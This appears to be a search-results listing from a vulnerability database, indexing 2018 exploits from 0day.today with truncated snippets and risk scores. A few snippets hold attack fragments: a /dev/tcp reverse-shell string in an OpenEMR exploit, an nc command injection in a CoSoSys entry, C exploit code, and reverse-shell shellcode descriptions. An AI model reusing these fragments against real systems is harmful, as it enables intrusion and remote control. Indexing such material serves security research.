Lucene search
K

39001 matches found

0day.today
0day.today
added 2018/08/09 12:0 a.m.130 views

Mikrotik WinBox 6.42 - Credential Disclosure Exploit

Exploit for windows platform in category remote exploits Exploit Title: Mikrotik WinBox 6.42 - Credential Disclosure Metasploit Date: 2018-05-21 Exploit Authors: Omid Shojaei @Dmitriyarea51, Dark VoidSeeker, Alireza Mosajjal Vendor Page: https://www.mikrotik.com/ Sotware Link:...

7.5AI score
Exploits0
0day.today
0day.today
added 2018/08/08 12:0 a.m.74 views

iSmartViewPro 1.5 - Device Alias Buffer Overflow Exploit

Exploit for windows platform in category local exploits Exploit Title: iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow Author: Rodrigo Eduardo Rodriguez Vendor Homepage: https://securimport.com/ Software Link:...

0.2AI score
Exploits0
0day.today
0day.today
added 2018/08/08 12:0 a.m.43 views

iSmartViewPro 1.5 - Account Buffer Overflow Exploit

Exploit for windows platform in category local exploits Exploit Title: iSmartViewPro 1.5 - 'Account' Buffer Overflow Discovery by: Alan Joaquín Baeza Meza Vendor Homepage: http://www.securimport.com/n/en/ Software Link:...

0.2AI score
Exploits0
0day.today
0day.today
added 2018/08/07 12:0 a.m.32 views

Microsoft Windows SCF File Feature Bypass Vulnerability

Microsoft Windows suffers from an SCF open file security warning feature bypass vulnerability. Exploit Title: Microsoft Windows 'SCF' File 'Open File Security Warning' Feature Bypass Vulnerability Exploit Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link:...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/07 12:0 a.m.42 views

Open-AudIT Community 2.2.6 - Cross-Site Scripting Vulnerability

Exploit for windows platform in category web applications Exploit Title: Open-AudIT Community 2.2.6 - Cross-Site Scripting Exploit Author: Ranjeet Jaiswal Vendor Homepage: https://opmantek.com/ Software Link:https://opmantek.com/network-tools-download/open-audit/ Affected Version: 2.2.6 Category:...

6.3AI score0.40434EPSS
Exploits5
0day.today
0day.today
added 2018/08/07 12:0 a.m.35 views

QNap QVR Client 5.0.3.23100 - Denial of Service Exploit

Exploit for windows platform in category dos / poc Exploit Title : QNap QVR Client 5.0.3.23100 - Denial of Service PoC Discovery by : Rodrigo Eduardo Rodriguez Vendor Homepage: http://www.qnapsecurity.com/n/en/ Software Link : http://download.qnap.com/Surveillance/Utility/QNewMon5.zip Tested...

0.2AI score
Exploits0
0day.today
0day.today
added 2018/08/07 12:0 a.m.100 views

OpenEMR < 5.0.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...

Exploits0
0day.today
0day.today
added 2018/08/07 12:0 a.m.63 views

OCS Inventory NG Webconsole Shell Upload Vulnerability

OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted. Title Unrestricted File Upload RCE in OCS Inventory NG Webconsole before 2.5 Reserved CVE...

0.7AI score0.0369EPSS
Exploits2
0day.today
0day.today
added 2018/08/06 12:0 a.m.51 views

Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection Vulnerability

Exploit for jsp platform in category web applications Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection Reserved CVE: CVE-2018-13415 Vulnerability Overview The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity...

0.2AI score0.31809EPSS
Exploits5
0day.today
0day.today
added 2018/08/06 12:0 a.m.44 views

PHP Template Store Script 3.0.6 - Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name Site Titel : Exclusive Scripts Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/ Category: Web...

5.6AI score0.01604EPSS
Exploits5
0day.today
0day.today
added 2018/08/06 12:0 a.m.62 views

LAMS < 3.1 - Cross-Site Scripting Vulnerability

Exploit for java platform in category web applications Exploit Title: LAMS 3.1 - Cross-Site Scripting Exploit Author: Nikola Kojic Website: https://ras-it.rs/ Vendor Homepage: https://www.lamsfoundation.org/ Software Link: https://www.lamsfoundation.org/downloadshome.htm Category: Web Application...

4.3CVSS6.4AI score0.02244EPSS
Exploits3
0day.today
0day.today
added 2018/08/06 12:0 a.m.132 views

PokerStars - Insecure Library Loading Code Execution Exploit

PokerStars is an online poker company based in Ta 'Xbiex, Malta. PokerStars holds licenses in all countries where online gaming is regulated: France, Belgium, Italy, Spain, Denmark, Estonia, Germany. In countries where there is no regulation on online poker PokerStars.com is the most popular onli...

3.2AI score
Exploits0
0day.today
0day.today
added 2018/08/06 12:0 a.m.31 views

CMS ISWEB 3.5.3 - Directory Traversal Vulnerability

Exploit for php platform in category web applications Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal Exploit Author: Thiago "thxsena" Sena Vendor Homepage: http://www.isweb.it Version: 3.5.3 Tested on: Linux CVE : N/A PoC: CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file...

0.4AI score
Exploits0
0day.today
0day.today
added 2018/08/06 12:0 a.m.33 views

Wedding Slideshow Studio 1.36 - Buffer Overflow Exploit

Exploit for windows platform in category local exploits Exploit Title: Socumsoft Wedding Slideshow Studio 1.36 Date: 02.08.2018 Exploit Author: Achilles Vendor Homepage: http://www.socusoft.com Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe Tested on OS: Windows 7...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/08/06 12:0 a.m.37 views

cgit < 1.2.1 - cgit_clone_objects() Directory Traversal Vulnerability

Exploit for cgi platform in category web applications There is a directory traversal vulnerability in cgitcloneobjects, reachable when the configuration flag enable-http-clone is set to 1 default: void cgitcloneobjectsvoid if !ctx.qry.path cgitprinterrorpage400, "Bad request", "Bad request";...

0.5AI score
Exploits0
0day.today
0day.today
added 2018/08/06 12:0 a.m.70 views

Subrion CMS 4.2.1 - Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: Subrion CMS- 4.2.1 XSS Using component with known Vulnerability Exploit Author: Zeel Chavda Vendor Homepage: https://subrion.org/ Software Link: https://subrion.org/download/ Version: 4.2.1 REQUIRED Tested on: Windows,FireFox CV...

6.3AI score0.03666EPSS
Exploits6
0day.today
0day.today
added 2018/08/06 12:0 a.m.67 views

onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin) Vulnerability

Exploit for php platform in category web applications Exploit Title: Cross-Site Request Forgery Add Admin Google Dork: Powered by onArcade v2.4.2 Author: r3m0t3nu11Zero-way Software Link: "http://www.onarcade.com" Version: "Uptodate" the appilication is vulnerable to CSRF attack No CSRF token in...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/08/06 12:0 a.m.104 views

Monstra 3.0.4 - Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title:Monstra-Dev 3.0.4 Stored Cross Site Scripting Exploit Author: Nainsi Gupta Vendor Homepage: http://monstra.org/ Software Link: https://github.com/monstra-cms/monstra Published In-...

0.01952EPSS
Exploits3
0day.today
0day.today
added 2018/08/06 12:0 a.m.110 views

Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation Exploit

Exploit for windows platform in category local exploits include "stdafx.h" include include include include pragma comment lib,"psapi" PULONGLONG leakbuffer = PULONGLONGVirtualAllocLPVOID0x000000001a000000, 0x2000, MEMRESERVE | MEMCOMMIT, PAGEREADWRITE; ULONGLONG leakQWORDULONGLONG addr, HANDLE...

7.2CVSS0.4AI score0.02029EPSS
Exploits5
0day.today
0day.today
added 2018/08/06 12:0 a.m.49 views

Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection Vulnerability

Exploit for jsp platform in category web applications Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection Reserved CVE: CVE-2018-13417 Vulnerability Overview The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML External...

0.2AI score0.20695EPSS
Exploits5
0day.today
0day.today
added 2018/08/03 12:0 a.m.82 views

Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 (86 bytes)

Title: Linux/x86 - Reverse TCP shell IPv6 + Null Free Shellcode Author: Kartik Durg Shellcode Length: 86 BYTES Student-ID: SLAE-1233 Note https://iamroot.blog/2018/07/29/0x2-shellreversetcpipv6-linux-x86/ Description: Connect-back to IPV6 socket listening on IP ::FFFF:192.168.1.5 and port 4444. /...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/08/03 12:0 a.m.192 views

ASUS DSL-N12E C1 1.1.2.3_345 - Remote Command Execution Exploit

Exploit for hardware platform in category web applications Exploit Title: ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/03 12:0 a.m.65 views

AgataSoft Auto PingMaster 1.5 - Host name Denial of Service PoC Exploit

Exploit for windows platform in category local exploits Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service PoC Discovery by: Luis Martinez Vendor Homepage: http://agatasoft.com/ Software Link : http://agatasoft.com/PingMaster.exe Tested Version: 1.5 Vulnerability Type:...

7.2AI score
Exploits0
0day.today
0day.today
added 2018/08/03 12:0 a.m.138 views

Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation Exploit

This Metasploit module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload UFO. This exploit targets only systems using Ubuntu Trusty / Xenial kernels 4.4.0-21 'Linux Kernel UDP Fragmentation Offset UFO Privilege Escalation', 'Description' = %q This module...

6CVSS7.8AI score0.20797EPSS
Exploits24
0day.today
0day.today
added 2018/08/03 12:0 a.m.63 views

Basic B2B Script 2.0.0 - Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields. Site Titel : B2B Script Vendor Homepage: https://www.phpscriptsmall.com/ Vendor Software :...

5.5AI score0.00663EPSS
Exploits4
0day.today
0day.today
added 2018/08/03 12:0 a.m.119 views

Seq 4.2.476 - Authentication Bypass Vulnerability

Exploit for windows platform in category web applications Exploit Title: Seq 4.2.476 - Authentication Bypass Exploit Author: Daniel Chactoura Vendor Homepage: https://getseq.net/ Software Link: https://getseq.net/Download/All Version: = 4.2.476 CVE : CVE-2018-8096 Post Reference:...

7.5CVSS9.7AI score0.5006EPSS
Exploits5
0day.today
0day.today
added 2018/08/02 12:0 a.m.55 views

Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: Chartered Accountant : Auditor Website 2.0.1 - Reflected , Stored XSS Site Titel : Find your needs on Domain Name Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...

0.01049EPSS
Exploits4
0day.today
0day.today
added 2018/08/02 12:0 a.m.60 views

WebRTC - H264 NAL Packet Processing Type Confusion Exploit

Exploit for multiple platform in category dos / poc Type confusion can occur when processing a H264 packet. In the method PacketBuffer::FindFrames in modules/videocoding/packetbuffer.cc there is a loop on line 296 that goes through the databuffer vector backwards. The flag ish264 is set before th...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.57 views

Sun Solaris 11.3 AVS - Local Kernel root Exploit

Exploit for solaris platform in category local exploits / Exploit Title: Solaris/OpenSolaris AVS kernel code execution Google Dork: if applicable Date: 24/7/2018 Exploit Author: mu-b Vendor Homepage: oracle.com Software Link: Version: Solaris 10, Solaris Sun Opensolaris include include include...

7.2CVSS7.6AI score0.01693EPSS
Exploits4
0day.today
0day.today
added 2018/08/02 12:0 a.m.28 views

PageResponse FB Inboxer Add-on 1.2 - search_field SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: FB Inboxer 1.2 - 'searchfield' SQL Injection Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage:...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.36 views

Imperva SecureSphere 12.0.0.50 - SealMode Shell Escape Exploit

Exploit for linux platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SecureSphere v12.0.0.50 - SealMode Shell Escape root", 'Description' = %q This module...

7.2AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.67 views

Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection Vulnerability

Exploit for jsp platform in category web applications Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processi...

0.3AI score0.20185EPSS
Exploits5
0day.today
0day.today
added 2018/08/02 12:0 a.m.47 views

WebRTC - VP8 Block Decoding Use-After-Free Exploit

Exploit for multiple platform in category dos / poc There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block is then treated a pointer, leading to a crash in WebRTC. ==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.44 views

WebRTC - FEC Processing Overflow Exploit

Exploit for multiple platform in category dos / poc There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incomingrtppacket, which is an RTP packet with a mac length that is defined by the...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.36 views

Easy DVD Creator 2.5.11 Buffer Overflow Exploit

Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' SEH Discovery by : Shubham Singh Known As : Spirited Wolf Twitter: @Pwsecspirit Email : email protected Youtube Channel :...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.45 views

CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection Exploit

Exploit for php platform in category web applications Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection Author : 0x09AL Tested on : Endpoint Protector 4.5.0.1 Software Link : https://www.endpointprotector.com/ Vulnerable Versions : Endpoint Protector &1|nc %s %s...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.1831 views

DataLife Engine 13.0 Cross Site Scripting Vulnerability

Exploit for php platform in category web applications + Title: DataLife Engine Core Cross Site Scripting XSS & Execution Code + Author: Mostafa Gharzi + Team: Maher - CertCC.ir + Vendor Homepage: www.dleviet.com www.dle-news.com + Tested on: Windows 10 & Kali Linux + Versions: 13.0 and Before +...

0.1AI score0.00653EPSS
Exploits3
0day.today
0day.today
added 2018/08/02 12:0 a.m.29 views

My Video Converter 1.5.24 Buffer Overflow Exploit

Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow Discovery by : Shubham Singh Known As : Spirited Wolf Twitter: @Pwsecspirit Email : email protected Youtube Channel : www.youtube.com/c/Pentestingwithspirit...

0.5AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.52 views

Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite Exploit

Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title : Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC Vulnerability Type: SEH Overwrite POC Discovery by : Shubham Singh Known As : Spirited Wolf Twitter: @Pwsecspirit Email : email protected Youtube Channel :...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.35 views

Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation Exploit

Exploit for linux platform in category local exploits Title: Imperva SecureSphere = v13 - Privilege Escalation Author: 0x09AL Tested on: Imperva SecureSphere 11.5,12.0,13.0 Vendor: https://www.imperva.com/ Vulnerability Description There is a program named PCE.py which runs as root and starts a...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.20 views

TI Online Examination System v2 - Arbitrary File Download Vulnerability

Exploit for php platform in category web applications Exploit Title: TI Online Examination System v2 - Arbitrary File Download Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 Version: 2.0 Category: Webapps Tested on:...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/02 12:0 a.m.45 views

WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change) Vulnerability

Exploit for php platform in category web applications i...

0.02513EPSS
Exploits5
0day.today
0day.today
added 2018/08/01 12:0 a.m.19 views

ipPulse 1.92 - Licence Key Denial of Service PoC Exploit

Exploit for windows platform in category dos / poc Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link:...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/01 12:0 a.m.34 views

Switch Port Mapping Tool 2.81 - SNMP Community Name Denial of Service PoC Exploit

Exploit for windows platform in category dos / poc Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service PoC Discovery by: Luis Martinez Vendor Homepage: https://switchportmapper.com/ Software Link : http://download.switchportmapper.com/spm281.zip Tested Version:...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/01 12:0 a.m.38 views

HRSale 1.0.6 Local File Disclosure Vulnerability

Exploit for php platform in category local exploits Exploit Title: HRSALE - HR Management PHP Script - LFD Exploit Author: ShanoWeb Author Mail : MrdotNet2NetatGmaildotcom Vendor Homepage: http://hrsale.com Software Buy: https://www.codester.com/items/8599/hrsale-hr-management-php-script Demo:...

7.2AI score
Exploits0
0day.today
0day.today
added 2018/08/01 12:0 a.m.29 views

Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)

/ Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode 116 Bytes Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.34-v7+ 1110 SMP Mon Apr 16 15:18:51 BST 2018 armv7l GNU/Linux pi@raspberrypi: $ lsbrelease -a No LSB modules are...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/07/31 12:0 a.m.126 views

Vtiger CRM 6.3.0 Authenticated Logo Upload Remote Command Execution Exploit

Vtiger version 6.3.0 CRM's administration interface allows for the upload of a company logo. Instead of uploading an image, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This Metasploit module was tested against vTiger CRM versi...

8.5CVSS0.5AI score0.40241EPSS
Exploits15
0day.today
0day.today
added 2018/07/31 12:0 a.m.45 views

SonicWall Global Management System XMLRPC Exploit

This Metasploit module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 Build 8110.1197 and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire netwo...

Exploits0
0day.today
0day.today
added 2018/07/31 12:0 a.m.80 views

MicroFocus Secure Messaging Gateway Remote Code Execution Exploit

This Metasploit module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user. One of the user supplied parameters of API endpoint is used by the application...

0.1AI score0.80539EPSS
Exploits5
0day.today
0day.today
added 2018/07/30 12:0 a.m.26 views

Microsoft Windows Kernel - win32k!NtUserConsoleControl Denial of Service PoC Exploit

Exploit for windows platform in category dos / poc Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service PoC Author: vportal Date: 2018-07-27 Vendor homepage: http://www.microsoft.com Version: Windows 7 x86 Tested on: Windows 7 x86 CVE: N/A It is possible to...

7.4AI score
Exploits0
Total number of security vulnerabilities39001